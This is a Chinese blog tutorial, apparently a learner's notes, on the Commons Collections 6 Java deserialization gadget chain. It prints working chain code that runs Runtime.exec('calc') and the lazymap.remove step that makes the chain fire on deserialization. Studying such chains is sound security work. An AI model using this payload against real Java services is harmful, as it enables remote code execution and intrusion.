java最好用的一条链-CC6

最新推荐文章于 2023-12-26 22:50:12 发布
最新推荐文章于 2023-12-26 22:50:12 发布
阅读量265 收藏
点赞数
文章标签: java 哈希算法 开发语言 web安全 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62540010/article/details/129769736
版权

java最好用的一条链-CC6

我们在前面的链中说到了,8u71是一个风水岭,因为AnnotationInvocationHandler#readObject的代码逻辑变了,checkValue函数没了,所以我们要重找入口点,最后找到重hash入手,这就是下面我们要介绍的cc6

首先我们先理一下利用逻辑

在AnnotationInvocationHandler之前的部分我们继续使用,也就是说lazymap我们还可以继续用,那就要重新找谁调用了lazymap的get方法,然后我们发现TiedMapEntry类里的getValue里正好调用了map.getValue并且参数我们可控,我们把lazymap传入即可,在往上就是hashMap的readObject中调用了hash(key)方法,而hash方法中又调用了key.hashcode方法,所以我们把让key为TiedMapEntry对象,再让其对象里有lazymap即可

在这里插入图片描述

继续看是谁调用了getValue,发现还是这个类中的方法,hashcode

在这里插入图片描述

我们先学习一下这个方法,在学习hashcode之前,我们先回顾一下hash

hash是一个函数,该函数中的实现就是一种算法,就是通过一系列的算法来得到一个hash值。这个时候,我们就需要知道另一个东西,hash表,通过hash算法得到的hash值就在这张hash表中,也就是说,hash表就是所有的hash值组成的,有很多种hash函数,也就代表着有很多种算法得到hash值

hashcode就是一个对象在hash表中的位置,他并不等同一个对象的物理地址,是对象的物理地址经过hash算法后才产生的hashcode,

hashcode的作用是为了用来在散列存储结构中确定对象的存储地址的,是为了查找更加方便,以及和equals方法的区别,两个对象的hashcode相等并不一定相等,但equals相等就一定相等

具体可以搜索这类文章

ok,我们回到正题,现在我们应该知道什么方法最可能调用hashcode方法了,那就是hash方法了,官方是找到了HashMap的hash方法

在这里插入图片描述

然后又用hashmap的ReadObject调用hash

Transformer[] transformers=new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",null}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,null}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);


        HashMap<Object,Object> map2 =new HashMap<>();
        Map<Object,Object>  lazymap =LazyMap.decorate(map2, chainedTransformer);

        TiedMapEntry tiedMapEntry=new TiedMapEntry(lazymap, "key");
        HashMap<Object,Object> map3 =new HashMap<>();
        map3.put(tiedMapEntry,"aaa");

但是上述代码我们在序列化的时候就直接弹计算器了,我们在利用时应该是在反序列化的时候执行命令,要不然在本地命令执行了,(这个想了很长时间也没想明白这个怎么在序列化的时候就执行了,前两条链就没执行,以及对之后利用有什么问题,真是想的头都大了)不过最大的问题是,我们进行序列化反序列化的时候,无法弹出计算器,我们看一下原因:

在这里插入图片描述

我们跟进一下,到了lazymap的get方法,containKey(key)方法判断是否有key值,我们下一步

在这里插入图片描述

我们发现构造的lazymap里map的key值为aaa,这就很奇怪,我们创建的时候给lazymap的是一个空map,这为什么就有值了呢
问题出在这个函数put

在这里插入图片描述

我们看到put里也有这个hash函数,也就是说起点不止一个,put函数先执行hash,在序列化的时候已经执行完了,弹出计算器,但是反序列化的时候,get方法把key又写进去了,从而无法进入if循环,所以我们要把这个key删除(现在想想因为put函数直接执行,上面的疑问好像解决了)

lazymap.remove("aaa");

在这里插入图片描述执行成功

Be_immortal
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
javacc-6.0
05-24
javacc-6.0 官方的,加上了 5.0 的执行脚本
CC6
..
10-27 726
因为JDK8u71后,Java 官方修改了 sun.reflect.annotation.AnnotationInvocationHandler 的readObject函数++ Class
java反序列化 cc6 分析
m0_64815693的博客
04-22 1017
java反序列化 cc6 分析
Javaweb安全——反序列化漏洞-CC6
weixin_43610673的博客
06-01 766
本文环境为 JDK8u11现在开始学习Java 8u71之后,即高版本Java利用,从CommonCollections6开始在 8u71之后AnnotationInvocationHandler的逻辑变成新建了一个LinkedHashMap对象,并将原来的键值添加进去,传进去的恶意Map不再执行set或put操作。而是通过invoke方法触发其get方法开始的,所以需要一个新的触发get方法的点,先看ysoserial当中CC6的 通过去触发get方法直接搜get,找到方法 查找其调用,跟踪到方法 要
Java反序列化 CC6利用记录
LTianHang的博客
02-07 137
Java反序列化 CC6利用记录
phonegap-phonegap-1.0.0-0-g80cc6dd.zip
09-21
phonegap-phonegap-1.0.0-0-g80cc6dd.zip
JavaScript应用实例-AD790179-8D8A-4CC6-BF68-25D58C7FD745.js
12-09
JavaScript应用实例-AD790179-8D8A-4CC6-BF68-25D58C7FD745.js
treinaweb-java-web-fundamentos:TreinaWeb的“ Java-Web基础知识”课程中生成的代码存储库
04-30
TreinaWeb:“ Java-Web基础知识”课程 存储库,其中包含在“ Java-Web基础知识”课程中生成的代码。 本课程中使用的工具: 日蚀氧气3 Java JDK 10 MySQL 8.0 / MySQL工作台6.3 提交清单 杂凑 描述 4ff290a94b...
学英文视频播放器 flash cc6 as2 编辑
03-04
压缩包内两个flash的EXE文件(分别横屏、竖屏...播放器使用flash cc6 As2编辑。 允许用户添加视频,修改或创建 xml 格式索引文件,供播放器选择加载。 XML文件的格式、编辑修改方法在压缩包的“注释”中有详细描述。
ios-QRCodeImageInside中间带图的二维码.zip
07-11
中间带图的二维码 Git地址:https://github.com/JarvisHot/QRCodeImageInside
CC6分析与复现
weixin_42974824的博客
08-18 631
CC6分析与复现
Java反序列化漏洞-CC6利用分析
最新发布
柠檬i的博客
12-26 1181
经过之前对[CC1]的分析,现在已经对反序列化利用有了初步的认识,这次来分析一个最好用的CC利用——CC6。 为什么CC6是最好用的CC利用,因为CC6不限制jdk版本,只要commons collections 小于等于3.2.1,都存在这个漏洞。
11-java安全——java反序列化CC5和CC6分析
网络安全
07-25 1779
CC5分析 复习LazyMap利用: https://blog.csdn.net/qq_35733751/article/details/118462281 在学习CC2时我们知道由于JDK8版本改写了AnnotationInvocationHandler类的readobject方法,CC1中LazyMap的get方法已经无法使用,CC5使用了BadAttributeValueExpException类来代替AnnotationInvocationHandler类,并且还用了一个新的类
Java安全--CC1的补充和CC6
qq_64201116的博客
12-08 1136
我们看一下两条子的分歧在哪里:从ChainedTransformer.transform()开始往下和上一次讲的子是一样的,这里就不赘述了。不一样的是transformer调用的函数从TransformedMap.checkSetValue()变成了LazyMap.get()我们现在的目标是搜索那里调用了get方法-->也是AnnotationInvocationHandler需要利用的点在AnnotationInvocationHandler的invoke()里面,而学完动态代理我们知道Invocat
CC6利用分析
qq_45766062的博客
08-19 1346
图片转存失败,源站可能有防盗机制,建议将图片保存下来直接上传(img-yCUl53uz-1660883653803)(/Users/kento/Library/Application Support/typora-user-images/image-20220819122923400.png)]但是到这里一步大家会发现,这里由于在序列化的时候本地执行了命令,所以,在反序列化的时候是失败的。相比较于cc1,cc6主要用的多一点的原因就是兼容高版本jdk。然后在反序列化之前再修改过来,这里可以通过。
Java安全学习笔记--反序列化漏洞利用CC6
m0_64685672的博客
01-24 1029
测试环境: jdk1.8(jdk8u71) Commons Collections4.0 HashSet HashSet使用的是Hash表的数据结构,增删改查的时间复杂度为O(1),Set是一种集合,元素没有添加顺序,集合中不会有重复元素,结合一下就大概知道HashSet的大概属性了,具体是否重复的算法是根据元素所属对象的equals()方法来判断是否重复,默认是Object这个父类的方法,会比较引用是否相同,这个方法是可以重写的,比如String类就重写了这个方法,会比较内容是否相同 .
[Java反序列化]Javacc6分析
Y4tacker的博客
06-02 1181
文章目录写在前面GadgetsJavaCC6分析利用参考文章 写在前面 感觉看完了cc1以后cc6就突然变得很简单了(来自P神的简化,这里我修改了一丢丢),那么就开始学习了 Gadgets /* Gadget chain: java.io.ObjectInputStream.readObject() java.util.HashMap.readObject() java.util.HashMap.hash() org.apache.commons.collections.k
cc6
lylong0703的博客
02-12 2759
cc6
Java安全』反序列化-CC6反序列化漏洞POP分析_ysoserial CommonsCollections6 PoC分析
Ho1aAs‘s Blog
03-13 558
文章目录前言代码复现工具类PoC代码审计 | 原理分析TiedMapEntry.hashCode()调用toString()方法POP完 前言 CC6触发TiedMapEntry.hashcode(),非常简单因此只做记录 代码复现 工具类 反序列化: UnserializePacked.Unserialize.java package UnserializePacked; import java.io.*; public class Unserialize { public static v
扮演一名大四学生,讲解以下代码爬取了什么东西 def detail_parse(self, response): fields = response.meta['fields'] if '(.*?)' in '<p data-v-cc6b2756>厂商:(.*?)</p>': fields["changshang"] = re.findall(r'<p data-v-cc6b2756>厂商:(.*?)</p>', response.text, re.S)[0].strip() else: if 'changshang' != 'xiangqing' and 'changshang' != 'detail' and 'changshang' != 'pinglun': fields["changshang"] = self.remove_html(response.css('<p data-v-cc6b2756>厂商:(.*?)</p>').extract_first()) else: fields["changshang"] = emoji.demojize(response.css('<p data-v-cc6b2756>厂商:(.*?)</p>').extract_first()) if '(.*?)' in '<p data-v-cc6b2756>油耗:(.*?)</p>': fields["youhao"] = re.findall(r'<p data-v-cc6b2756>油耗:(.*?)</p>', response.text, re.S)[0].strip() else: if 'youhao' != 'xiangqing' and 'youhao' != 'detail' and 'youhao' != 'pinglun': fields["youhao"] = self.remove_html(response.css('<p data-v-cc6b2756>油耗:(.*?)</p>').extract_first()) else: fields["youhao"] = emoji.demojize(response.css('<p data-v-cc6b2756>油耗:(.*?)</p>').extract_first()) if '(.*?)' in '<p data-v-cc6b2756>排量:(.*?)</p>': fields["pailiang"] = re.findall(r'<p data-v-cc6b2756>排量:(.*?)</p>', response.text, re.S)[0].strip() else: if 'pailiang' != 'xiangqing' and 'pailiang' != 'detail' and 'pailiang' != 'pinglun': fields["pailiang"] = self.remove_html(response.css('<p data-v-cc6b2756>排量:(.*?)</p>').extract_first()) else: fields["pailiang"] = emoji.demojize(response.css('<p data-v-cc6b2756>排量:(.*?)</p>').extract_first()) return fields
05-10
函数的输出是一个包含了厂商、油耗和排量等字段的字典(fields)。 首先,代码通过 response.meta['fields'] 获取要爬取的字段信息。然后,分别判断每个字段是否在网页中存在,如果存在,就使用正则表达式获取该...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值